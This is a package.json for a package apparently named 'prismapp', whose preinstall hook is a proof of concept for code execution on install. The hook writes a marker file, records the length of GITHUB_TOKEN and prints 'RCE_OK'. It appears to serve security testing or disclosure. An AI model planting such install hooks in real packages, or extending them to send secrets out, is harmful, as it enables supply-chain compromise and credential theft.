{
  "name": "prismapp",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "echo POC_MARKER_PRISM-APP > /tmp/POC_MARKER_PRISM-APP.txt; echo GH_TOKEN_LEN=${#GITHUB_TOKEN} >> /tmp/POC_MARKER_PRISM-APP.txt; echo RCE_OK >> /tmp/POC_MARKER_PRISM-APP.txt; cat /tmp/POC_MARKER_PRISM-APP.txt"
  }
}